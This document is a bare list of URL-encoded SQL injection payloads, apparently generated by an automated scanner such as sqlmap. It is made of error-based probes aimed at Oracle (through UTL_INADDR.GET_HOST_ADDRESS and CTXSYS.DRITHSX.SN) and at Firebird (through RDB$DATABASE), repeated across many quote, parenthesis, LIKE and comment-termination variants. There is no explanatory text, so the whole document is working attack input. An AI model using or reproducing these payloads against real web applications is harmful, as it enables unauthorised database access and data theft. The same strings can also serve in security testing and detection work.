1%27%2B%28SELECT%20Uxgc%20WHERE%206494%3D6494%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20%29%2B%27 1%27%2B%28SELECT%20%27juwR%27%20WHERE%209702%3D9702%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%202543%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282543%3D2543%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20%23 1%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 1%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%289068%3D9068 1%29%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%282896%3D2896 1%29%29%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%286096%3D6096 1%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 1%29%20WHERE%201633%3D1633%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 1%20WHERE%207861%3D7861%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 1%27%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 1%27%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 1%22%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 1%27%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27HHya%27%3D%27HHya 1%27%29%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27hafz%27%3D%27hafz 1%27%29%29%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27eslm%27%3D%27eslm 1%27%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%27JwoL%27%3D%27JwoL 1%27%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27Lbia%27%20LIKE%20%27Lbia 1%27%29%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27eEyf%27%20LIKE%20%27eEyf 1%27%29%29%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27Lcbz%27%20LIKE%20%27Lcbz 1%27%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%27QdKQ%27%20LIKE%20%27QdKQ 1%22%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22eNYr%22%3D%22eNYr 1%22%29%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22yIZN%22%3D%22yIZN 1%22%29%29%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22PtMt%22%3D%22PtMt 1%22%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%22KhPj%22%3D%22KhPj 1%22%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22TTCI%22%20LIKE%20%22TTCI 1%22%29%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22TzEs%22%20LIKE%20%22TzEs 1%22%29%29%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22BnRl%22%20LIKE%20%22BnRl 1%22%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%22oTMi%22%20LIKE%20%22oTMi 1%25%27%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27xnNX%27%3D%27xnNX 1%00%27%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%27gseN%27%3D%27gseN 1%27%29%20WHERE%209080%3D9080%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 1%22%29%20WHERE%207104%3D7104%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 1%27%20WHERE%209024%3D9024%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 1%22%20WHERE%208457%3D8457%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 1%27%7C%7C%28SELECT%20%27mHpr%27%20FROM%20DUAL%20WHERE%202861%3D2861%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27UOTk%27%20WHERE%207524%3D7524%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20%29%7C%7C%27 1%27%2B%28SELECT%20kfHg%20WHERE%204343%3D4343%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20%29%2B%27 1%27%2B%28SELECT%20%27NZvZ%27%20WHERE%205081%3D5081%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%204900%3DCTXSYS.DRITHSX.SN%284900%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284900%3D4900%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20%23 1%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29 1%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%288806%3D8806 1%29%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%286224%3D6224 1%29%29%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%285268%3D5268 1%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29 1%29%20WHERE%206756%3D6756%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20--%20 1%20WHERE%205118%3D5118%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20--%20 1%27%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29 1%27%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29 1%22%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29 1%27%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%27yzIn%27%3D%27yzIn 1%27%29%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%27UHdq%27%3D%27UHdq 1%27%29%29%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%28%27PdoF%27%3D%27PdoF 1%27%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%27Gwce%27%3D%27Gwce 1%27%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%27iQAc%27%20LIKE%20%27iQAc 1%27%29%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%27ywXo%27%20LIKE%20%27ywXo 1%27%29%29%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%28%27cxUy%27%20LIKE%20%27cxUy 1%27%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%27CAjW%27%20LIKE%20%27CAjW 1%22%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%22AZqy%22%3D%22AZqy 1%22%29%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%22Wicd%22%3D%22Wicd 1%22%29%29%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%28%22ApZV%22%3D%22ApZV 1%22%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%22lHeE%22%3D%22lHeE 